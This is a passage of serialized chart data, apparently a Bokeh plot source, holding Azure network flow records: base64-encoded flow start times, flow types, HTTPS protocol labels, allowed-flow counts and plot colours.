",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"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AIDOLoiOdkIAAA0viI52QgAADS+IjnZCAIAbN4iOdkIAAFquiY52QgCAmZOKjnZCAICZk4qOdkIAAHMMi452QgAAcwyLjnZCAADwDIuOdkIAAPAMi452QgAA8AyLjnZCAABPEouOdkIAAK0si452QgAArSyLjnZCAACtLIuOdkIAgOssi452QgCA5S2LjnZCAAA9A46OdkIAAD0Djo52QgAAW3uOjnZCAABbe46OdkIAADeBjo52QgAAEMaOjnZCAAAQxo6OdkIAgBSgj452QgCADqGPjnZCAAB2o5GOdkIAAHajkY52QgAAQ+qRjnZCAABD6pGOdkIAAD3rkY52QgAAPeuRjnZCAAA965GOdkIAAB/wkY52QgAA3eiUjnZCAADd6JSOdkIAACtZlY52QgAAK1mVjnZCAAAHX5WOdkIAAF2klY52QgAAXaSVjnZCAIBVdJiOdkIAgBN/mI52QgCAE3+YjnZCAIDUx5iOdkIAAO/NmI52QgAARROZjnZCAABFE5mOdkIAgCDTm452QgCAINObjnZCAICJAJyOdkIAgIkAnI52QgCAiQCcjnZCAAD7NpyOdkIAAPs2nI52QgAA1zycjnZCAACwe52OdkIAAPUln452QgAA9SWfjnZCAID3L5+OdkIAgPcvn452QgCA9y+fjnZCAID3L5+OdkIAAK0xn452QgAArTGfjnZCAADjpZ+OdkIAAL+rn452QgCAU/GfjnZCAIDDhaCOdkIAAO6moo52QgAA7qaijnZCAADLFKOOdkIAAMsUo452QgAApxqjjnZCAACnGqOOdkIAAKcao452QgAAY0+jjnZCAABjT6OOdkIAAGNPo452QgCAucijjnZCAIC5yKOOdkIAACHXo452QgAAIdejjnZCAAAh16OOdkIAAA/ao452QgAAvxCkjnZCAAC/EKSOdkIAgP0QpI52QgCA/RCkjnZCAICABKaOdkIAgIAEpo52QgCAiqmmjnZCAAC3rKaOdkIAALespo52QgCA0ESnjnZCAAA9YaiOdkIAAD1hqI52QgAAI4mpjnZCAAAjiamOdkIAAHaQqY52QgAAdpCpjnZCAACxGKqOdkIAgLizqo52QgAA6OisjnZCAADo6KyOdkIAgKL+rI52QgCA14etjnZCAIC+Ha6OdkIAgL4dro52QgAA3yKujnZCAICRY66OdkIAALCGsI52QgAAsIawjnZCAAD+9rCOdkIAgDZ1sY52QgCApoyxjnZCAICmjLGOdkIAAMeRsY52QgAAUfixjnZCAAD7L7KOdkIAADrbs452QgAAOtuzjnZCAADmZbSOdkIAANP6tI52QgCA8/+0jnZCAIDz/7SOdkIAgPP/tI52QgAArwC1jnZCAIAqU7eOdkIAgCpTt452QgCAIZO3jnZCAIAhk7eOdkIAAD/Xt452QgAAP9e3jnZCAACXb7iOdkIAgPCduo52QgCA8J26jnZCAACrs7qOdkIAAKuzuo52QgAAc+a6jnZCAABz5rqOdkIAAHPmuo52QgAAM0S7jnZCAAB/3ruOdkIAAGdNv452QgAA67S/jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[372]},\"FlowType\":[\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\"],\"L7Protocol\":[\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAEEAAAAAAAAA4QAAAAAAAADhAAAAAAAAAOEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAwQAAAAAAAADBAAAAAAAAA8D8AAAAAAADwPwAAAAAAADJAAAAAAAAAMkAAAAAAAAAUQAAAAAAAABRAAAAAAAAAAEAAAAAAAAAgQAAAAAAAACBAAAAAAAAAIEAAAAAAAAAQQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAAQAAAAAAAADBAAAAAAAAAMEAAAAAAAADwPwAAAAAAAAhAAAAAAAAAAEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAMUAAAAAAAAAcQAAAAAAAABxAAAAAAAAACEAAAAAAAAAIQAAAAAAAAAhAAAAAAAAAMUAAAAAAAADwPwAAAAAAAC5AAAAAAAAALkAAAAAAAAAuQAAAAAAAAC5AAAAAAAAAEEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAIBFQAAAAAAAgEVAAAAAAAAAPEAAAAAAAAA8QAAAAAAAAABAAAAAAAAAAEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAgQAAAAAAAACBAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAADwPwAAAAAAACpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAKkAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAChAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAAEAAAAAAAAAqQAAAAAAAACBAAAAAAAAAIEAAAAAAAADwPwAAAAAAAABAAAAAAAAAKEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAIkAAAAAAAAAiQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAqQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAA8D8AAAAAAAAqQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAqQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAoQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAChAAAAAAAAAEEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKkAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAAEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAKkAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAACpAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAmQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAADwPwAAAAAAACZAAAAAAAAACEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAKkAAAAAAAADwPwAAAAAAABBAAAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAALEAAAAAAAAAAQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAKkAAAAAAAAAoQAAAAAAAAChAAAAAAAAAKEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAiQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAA8D8AAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAUQAAAAAAAABRAAAAAAAAAIkAAAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAxQAAAAAAAADFAAAAAAAAACEAAAAAAAADwPwAAAAAAABhAAAAAAAAAGEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAAhAAAAAAAAA8D8AAAAAAAA6QAAAAAAAADpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAiQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAANkAAAAAAAAA2QAAAAAAAAABAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAIQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAEEAAAAAAAADwPwAAAAAAADFAAAAAAAAAMUAAAAAAAADwPwAAAAAAAPA/AAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAxQAAAAAAAADFAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAAQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAAMkAAAAAAAAAyQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAwQAAAAAAAADBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[372]},\"color\":[\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#36